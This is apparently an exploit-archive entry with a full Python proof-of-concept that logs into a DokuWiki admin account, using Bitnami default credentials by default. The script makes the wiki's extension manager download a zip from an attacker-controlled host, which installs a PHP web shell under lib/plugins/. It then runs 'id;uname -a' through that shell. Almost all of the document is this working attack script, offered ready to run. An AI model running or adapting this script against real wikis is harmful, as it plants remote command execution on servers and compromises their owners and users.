DokuWiki Proof Of Concept Shell Upload (authenticated: abuses the admin extension manager's install-from-URL to drop a PHP file under lib/plugins/)

2017.05.31
Credit: c
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

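#!/usr/bin/env python
# shell-dokuwiki.py - module to upload a shell through DokuWiki's extension
# manager, based on the previous version created 28.04.2017.
#
# What this is: an authenticated, admin-side "feature", not an unauthenticated
# bug. The extension manager (do=admin&page=extension&tab=install) takes an
# "installurl", fetches the zip and unpacks it under lib/plugins/<name>/; a
# PHP file shipped inside that zip is then served straight from the web root.
# Valid credentials for an account that may use the extension manager are
# therefore a hard requirement - hence the low risk rating.
#
# To run the PoC you need:
#   * credentials (the defaults below are the Bitnami DokuWiki stack defaults);
#   * an HTTP host you control serving the plugin zip (DEFAULT_PAYLOAD_URL or
#     the 4th argument); the zip must contain SHELL_FILE, a PHP file that runs
#     the "x" GET parameter;
#   * the *target* must be able to fetch the payload URL (outbound HTTP from
#     the wiki server, not from your machine).
#
# Changes from the original single-shot script: target, credentials and payload
# URL can be given on the command line (defaults unchanged, interactive prompt
# kept), every step reports its failure instead of ending silently, the admin
# page is fetched once instead of twice, the CSRF-token regex tolerates
# `" />`, and the command is URL-encoded via `params` instead of being spliced
# into the URL. The installed plugin is NOT removed - delete it through the
# extension manager once you are done.
from __future__ import print_function

import re
import sys

import requests

# Defaults kept from the original PoC.
DEFAULT_USER = 'user'
DEFAULT_PASSWORD = 'bitnami'
DEFAULT_PAYLOAD_URL = 'http://192.168.1.205/mishell.zip'
# PHP file inside the payload zip and the command the PoC asks it to run.
SHELL_FILE = 'mishell.php'
SHELL_COMMAND = 'id;uname -a'

# DokuWiki's CSRF token. The original pattern required exactly `"/>` and
# silently matched nothing on templates that emit `" />`.
SECTOK_RE = re.compile(r'<input type="hidden" name="sectok" value="([^"]*)"\s*/?>')
# Success banner of the extension manager (English UI string).
INSTALLED_RE = re.compile(r'<div class="success">Plugin (.*?) installed successfully</div>')

try:  # Python 2
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input


def usage():
    """Print command-line usage to stderr."""
    print('usage: %s [target_url [user password [payload_zip_url]]]' % sys.argv[0],
          file=sys.stderr)


def normalize_target(target):
    """Strip whitespace and a trailing slash; default to http:// when no scheme was given."""
    target = target.strip().rstrip('/')
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target


def extension_install_url(target):
    """Return the URL of the extension manager's "install" tab."""
    return target + '/doku.php?id=start&do=admin&page=extension&tab=install'


def login(session, target, user, password):
    """POST the credentials to DokuWiki's login action.

    Returns the HTML of the extension-install tab fetched right after the
    login, or None when the page does not show an authenticated session.
    'Log Out' is the English UI string; a localized wiki needs a different
    marker (the original PoC had the same limitation).
    """
    login_url = target + '/doku.php?id=start&do=login&sectok='
    session.post(login_url, data={'u': user, 'p': password})
    html = session.get(extension_install_url(target)).text
    if 'Log Out' not in html:
        return None
    return html


def find_sectok(html):
    """Return the CSRF token from the admin page, or None when absent.

    A logged-in account without admin/manager rights presumably does not get
    the install form rendered, so a missing token is treated as "not allowed
    to use the extension manager" rather than as a parsing error.
    """
    match = SECTOK_RE.search(html)
    return match.group(1) if match else None


def install_plugin(session, target, sectok, payload_url):
    """Submit the install-from-URL form; return the installed plugin name or None."""
    data = {'sectok': sectok, 'installurl': payload_url}
    html = session.post(extension_install_url(target), data=data).text
    match = INSTALLED_RE.search(html)
    return match.group(1) if match else None


def shell_url(target, plugin_name):
    """Return the URL at which the PHP file from the payload zip is served."""
    return target + '/lib/plugins/' + plugin_name + '/' + SHELL_FILE


def run(session, target, user, password, payload_url):
    """Perform login -> token -> install -> verify; return a process exit status."""
    admin_html = login(session, target, user, password)
    if admin_html is None:
        print('[-] Can not login. Something is wrong :C')
        return 1
    # Only the login is confirmed here; admin rights are confirmed by the token.
    print('[+] We are logged-in. Preparing shell...')
    sectok = find_sectok(admin_html)
    if sectok is None:
        print('[-] No "sectok" on the extension page - account is probably not admin/manager.')
        return 1
    print('[+] Found "sectok":' + sectok)
    print('[+] Preparing shell params to upload')
    plugin = install_plugin(session, target, sectok, payload_url)
    if plugin is None:
        print('[-] No "installed successfully" message - check that the target can fetch %s'
              % payload_url)
        return 1
    print('[+] Mishell name:' + plugin)
    # `params` URL-encodes the ';' and the space that the original pasted raw.
    verify = session.get(shell_url(target, plugin), params={'x': SHELL_COMMAND})
    print(' ', verify.text)
    print('')
    print('[+] Your shell should be here:', verify.url)
    return 0


def main(argv=None):
    """Entry point.

    argv: [target [user password [payload_zip_url]]]. A missing target is asked
    for interactively, as in the original. Returns 0 on success, 1 when a step
    fails or an HTTP error occurs, 2 on bad usage.
    """
    argv = sys.argv[1:] if argv is None else argv
    if len(argv) not in (0, 1, 3, 4):
        usage()
        return 2

    print('[+] Module : dokuwiki - started.')
    print()
    target = normalize_target(argv[0] if argv else _read_line('[+] Hostname> '))
    if len(argv) >= 3:
        user, password = argv[1], argv[2]
    else:
        user, password = DEFAULT_USER, DEFAULT_PASSWORD
    payload_url = argv[3] if len(argv) == 4 else DEFAULT_PAYLOAD_URL
    print()

    session = requests.session()
    try:
        status = run(session, target, user, password, payload_url)
    except requests.RequestException as exc:
        print('[-] HTTP error: %s' % exc)
        status = 1
    print('[+] Module : dokuwiki - finished.')
    return status


if __name__ == '__main__':
    sys.exit(main())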

